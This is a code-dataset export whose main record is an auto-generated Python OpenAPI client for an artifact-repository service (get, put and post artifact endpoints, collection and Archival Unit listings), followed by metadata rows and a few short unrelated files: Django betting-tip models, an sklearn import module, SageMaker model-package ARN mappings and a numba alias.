return self.api_client.call_api(
'/collections/{collectionid}/artifacts/{artifactid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StreamingResponseBody', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_artifacts_artifactid_put(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Update the committed property of an artifact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_put(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:param bool committed: New commit status of artifact
:return: Artifact
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_artifacts_artifactid_put_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_artifacts_artifactid_put_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
return data
def collections_collectionid_artifacts_artifactid_put_with_http_info(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Update the committed property of an artifact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_put_with_http_info(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:param bool committed: New commit status of artifact
:return: Artifact
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'artifactid', 'committed'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_artifacts_artifactid_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_put`") # noqa: E501
# verify the required parameter 'artifactid' is set
if ('artifactid' not in params or
params['artifactid'] is None):
raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
if 'artifactid' in params:
path_params['artifactid'] = params['artifactid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'committed' in params:
form_params.append(('committed', params['committed'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/artifacts/{artifactid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Artifact', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_artifacts_post(self, collectionid, auid, uri, content, **kwargs): # noqa: E501
"""Create an artifact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_post(collectionid, auid, uri, content, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str auid: Archival Unit ID (AUID) of new artifact (required)
:param str uri: URI represented by this artifact (required)
:param file content: Content byte stream (required)
:param file aspect_parts: URI aspects represented by this artifact
:return: Artifact
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_artifacts_post_with_http_info(collectionid, auid, uri, content, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_artifacts_post_with_http_info(collectionid, auid, uri, content, **kwargs) # noqa: E501
return data
def collections_collectionid_artifacts_post_with_http_info(self, collectionid, auid, uri, content, **kwargs): # noqa: E501
"""Create an artifact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_post_with_http_info(collectionid, auid, uri, content, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str auid: Archival Unit ID (AUID) of new artifact (required)
:param str uri: URI represented by this artifact (required)
:param file content: Content byte stream (required)
:param file aspect_parts: URI aspects represented by this artifact
:return: Artifact
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'auid', 'uri', 'content', 'aspect_parts'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_artifacts_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_post`") # noqa: E501
# verify the required parameter 'auid' is set
if ('auid' not in params or
params['auid'] is None):
raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_artifacts_post`") # noqa: E501
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `collections_collectionid_artifacts_post`") # noqa: E501
# verify the required parameter 'content' is set
if ('content' not in params or
params['content'] is None):
raise ValueError("Missing the required parameter `content` when calling `collections_collectionid_artifacts_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'auid' in params:
form_params.append(('auid', params['auid'])) # noqa: E501
if 'uri' in params:
form_params.append(('uri', params['uri'])) # noqa: E501
if 'content' in params:
local_var_files['content'] = params['content'] # noqa: E501
if 'aspect_parts' in params:
local_var_files['aspectParts'] = params['aspect_parts'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/artifacts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Artifact', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_aus_auid_artifacts_get(self, collectionid, auid, **kwargs): # noqa: E501
"""Get committed artifacts in a collection and Archival Unit # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_auid_artifacts_get(collectionid, auid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the artifacts (required)
:param str auid: Identifier of the Archival Unit containing the artifacts (required)
:param str url: The URL contained by the artifacts
:param str url_prefix: The prefix to be matched by the artifact URLs
:param str version: The version of the URL contained by the artifacts
:return: list[Artifact]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_aus_auid_artifacts_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_aus_auid_artifacts_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
return data
def collections_collectionid_aus_auid_artifacts_get_with_http_info(self, collectionid, auid, **kwargs): # noqa: E501
"""Get committed artifacts in a collection and Archival Unit # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_auid_artifacts_get_with_http_info(collectionid, auid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the artifacts (required)
:param str auid: Identifier of the Archival Unit containing the artifacts (required)
:param str url: The URL contained by the artifacts
:param str url_prefix: The prefix to be matched by the artifact URLs
:param str version: The version of the URL contained by the artifacts
:return: list[Artifact]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'auid', 'url', 'url_prefix', 'version'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_aus_auid_artifacts_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_auid_artifacts_get`") # noqa: E501
# verify the required parameter 'auid' is set
if ('auid' not in params or
params['auid'] is None):
raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_aus_auid_artifacts_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
if 'auid' in params:
path_params['auid'] = params['auid'] # noqa: E501
query_params = []
if 'url' in params:
query_params.append(('url', params['url'])) # noqa: E501
if 'url_prefix' in params:
query_params.append(('urlPrefix', params['url_prefix'])) # noqa: E501
if 'version' in params:
query_params.append(('version', params['version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/aus/{auid}/artifacts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Artifact]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_aus_auid_size_get(self, collectionid, auid, **kwargs): # noqa: E501
"""Get the size of Archival Unit artifacts in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_auid_size_get(collectionid, auid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the artifacts (required)
:param str auid: Identifier of the Archival Unit containing the artifacts (required)
:param str url: The URL contained by the artifacts
:param str url_prefix: The prefix to be matched by the artifact URLs
:param str version: The version of the URL contained by the artifacts
:return: int
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
return data
def collections_collectionid_aus_auid_size_get_with_http_info(self, collectionid, auid, **kwargs): # noqa: E501
"""Get the size of Archival Unit artifacts in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the artifacts (required)
:param str auid: Identifier of the Archival Unit containing the artifacts (required)
:param str url: The URL contained by the artifacts
:param str url_prefix: The prefix to be matched by the artifact URLs
:param str version: The version of the URL contained by the artifacts
:return: int
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'auid', 'url', 'url_prefix', 'version'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_aus_auid_size_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_auid_size_get`") # noqa: E501
# verify the required parameter 'auid' is set
if ('auid' not in params or
params['auid'] is None):
raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_aus_auid_size_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
if 'auid' in params:
path_params['auid'] = params['auid'] # noqa: E501
query_params = []
if 'url' in params:
query_params.append(('url', params['url'])) # noqa: E501
if 'url_prefix' in params:
query_params.append(('urlPrefix', params['url_prefix'])) # noqa: E501
if 'version' in params:
query_params.append(('version', params['version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/aus/{auid}/size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='int', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_aus_get(self, collectionid, **kwargs): # noqa: E501
"""Get Archival Unit IDs (AUIDs) in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_get(collectionid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the Archival Units (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_aus_get_with_http_info(collectionid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_aus_get_with_http_info(collectionid, **kwargs) # noqa: E501
return data
def collections_collectionid_aus_get_with_http_info(self, collectionid, **kwargs): # noqa: E501
"""Get Archival Unit IDs (AUIDs) in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_get_with_http_info(collectionid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the Archival Units (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_aus_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/aus', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_get(self, **kwargs): # noqa: E501
"""Get collection identifiers of the committed artifacts in the repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_get(async=True)
>>> result = thread.get()
:param async bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.collections_get_with_http_info(**kwargs) # noqa: E501
return data
def collections_get_with_http_info(self, **kwargs): # noqa: E501
"""Get collection identifiers of the committed artifacts in the repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.964892
| 159
| 0.635378
| 4,277
| 38,821
| 5.55062
| 0.04606
| 0.04246
| 0.056613
| 0.024263
| 0.965333
| 0.956024
| 0.952275
| 0.945324
| 0.936647
| 0.926411
| 0
| 0.013794
| 0.279153
| 38,821
| 882
| 160
| 44.014739
| 0.834548
| 0.06275
| 0
| 0.783058
| 0
| 0
| 0.21982
| 0.077515
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008264
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
315746974e69f625bc7caafc3ff172ff3f8ede0a
| 172
|
py
|
Python
|
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
from .keras import plot_keras_history
from .sklearn import split_data
from .sklearn import encode_target
from .sklearn import plot_confusion_matrix
from . import pytorch
| 21.5
| 42
| 0.843023
| 25
| 172
| 5.56
| 0.52
| 0.23741
| 0.366906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127907
| 172
| 8
| 43
| 21.5
| 0.926667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
315f2bef3e17c7a64506f51d88cafc1ec609e079
| 2,523
|
py
|
Python
|
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | null | null | null |
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | 3
|
2020-06-05T18:28:06.000Z
|
2021-06-10T20:33:26.000Z
|
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
import datetime
from django.conf import settings
from django.urls import reverse
from django.db.models.signals import post_save
from django.dispatch import receiver
class Punter(models.Model):
published_date = models.DateTimeField('Date Published')
country = models.CharField(max_length = 200)
home_team = models.CharField(max_length = 200)
home_score = models.IntegerField(default = 0)
away_score = models.IntegerField(default = 0)
away_team = models.CharField(max_length = 200)
prediction = models.CharField(max_length = 100)
status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
def __str__(self):
return self.home_team
class Hexabet(models.Model):
published_date = models.DateTimeField('Date Published')
country = models.CharField(max_length = 200)
home_team = models.CharField(max_length = 200)
home_score = models.IntegerField(default = 0)
away_score = models.IntegerField(default = 0)
away_team = models.CharField(max_length = 200)
safety = models.CharField(max_length = 200, default="")
prediction = models.CharField(max_length = 100)
status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
def __str__(self):
return self.home_team
class Singlebet(models.Model):
published_date = models.DateTimeField('Date Published')
country = models.CharField(max_length = 200)
home_team = models.CharField(max_length = 200)
home_score = models.IntegerField(default = 0)
away_score = models.IntegerField(default = 0)
away_team = models.CharField(max_length = 200)
safety = models.CharField(max_length = 200, default="")
prediction = models.CharField(max_length = 100)
status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
def __str__(self):
return self.home_team
class Jackpot(models.Model):
published_date = models.DateTimeField('Date Published')
content = models.TextField(null=True, blank=True)
no = models.CharField(max_length = 200, default="")
country = models.CharField(max_length = 200)
home_team = models.CharField(max_length = 200)
away_team = models.CharField(max_length = 200)
prediction = models.CharField(max_length = 100)
def __str__(self):
return self.home_team
| 38.815385
| 110
| 0.717004
| 317
| 2,523
| 5.514196
| 0.18612
| 0.188787
| 0.226545
| 0.30206
| 0.825515
| 0.825515
| 0.806064
| 0.790046
| 0.758009
| 0.758009
| 0
| 0.034026
| 0.161316
| 2,523
| 64
| 111
| 39.421875
| 0.79206
| 0
| 0
| 0.735849
| 0
| 0
| 0.05549
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.150943
| 0.075472
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
31861d3a31bc5021eb63adc8dfe1430e7abf184c
| 49
|
py
|
Python
|
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | 7
|
2020-07-27T12:33:18.000Z
|
2021-11-06T09:30:32.000Z
|
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | null | null | null |
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | 6
|
2020-07-07T01:11:53.000Z
|
2021-04-23T03:44:44.000Z
|
Deviation = (1500, 1500, 1500, 1500, 1500, 1500)
| 24.5
| 48
| 0.673469
| 7
| 49
| 4.714286
| 0.285714
| 1.212121
| 1.454545
| 1.454545
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0.585366
| 0.163265
| 49
| 1
| 49
| 49
| 0.219512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
31a5a30aedbccf05973ef45df8a5ab9818462fa5
| 2,124
|
py
|
Python
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,610
|
2020-10-01T14:14:53.000Z
|
2022-03-31T18:02:31.000Z
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 1,959
|
2020-09-30T20:22:42.000Z
|
2022-03-31T23:58:37.000Z
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,052
|
2020-09-30T22:11:46.000Z
|
2022-03-31T23:02:51.000Z
|
class ScikitArnProvider:
@staticmethod
def get_model_package_arn(current_region):
mapping = {
"ap-south-1": "arn:aws:sagemaker:ap-south-1:077584701553:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"ap-northeast-2": "arn:aws:sagemaker:ap-northeast-2:745090734665:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"ap-southeast-1": "arn:aws:sagemaker:ap-southeast-1:192199979996:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"ap-southeast-2": "arn:aws:sagemaker:ap-southeast-2:666831318237:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"ap-northeast-1": "arn:aws:sagemaker:ap-northeast-1:977537786026:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"ca-central-1": "arn:aws:sagemaker:ca-central-1:470592106596:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"eu-central-1": "arn:aws:sagemaker:eu-central-1:446921602837:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"eu-west-1": "arn:aws:sagemaker:eu-west-1:985815980388:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"eu-west-2": "arn:aws:sagemaker:eu-west-2:856760150666:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"us-east-1": "arn:aws:sagemaker:us-east-1:865070037744:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"us-east-2": "arn:aws:sagemaker:us-east-2:057799348421:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"us-west-1": "arn:aws:sagemaker:us-west-1:382657785993:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
"us-west-2": "arn:aws:sagemaker:us-west-2:594846645681:model-package/scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30",
}
return mapping[current_region]
| 106.2
| 156
| 0.760829
| 236
| 2,124
| 6.826271
| 0.186441
| 0.104283
| 0.121043
| 0.177529
| 0.81378
| 0.623836
| 0.623836
| 0.535692
| 0.490379
| 0
| 0
| 0.301211
| 0.105932
| 2,124
| 19
| 157
| 111.789474
| 0.54713
| 0
| 0
| 0
| 0
| 0.684211
| 0.802731
| 0.734934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
732e15bcbabdf63515fb362ddeb261e6b7455494
| 195
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 1,738
|
2017-09-21T10:59:12.000Z
|
2022-03-31T21:05:46.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 427
|
2017-09-29T22:54:36.000Z
|
2022-02-15T19:26:50.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 671
|
2017-09-21T08:04:01.000Z
|
2022-03-29T14:30:07.000Z
|
# -*- coding: utf-8 -*-
"""
Alias to numba.typing.cffi_utils for backward compatibility
"""
from __future__ import print_function, division, absolute_import
from numba.typing.cffi_utils import *
| 27.857143
| 64
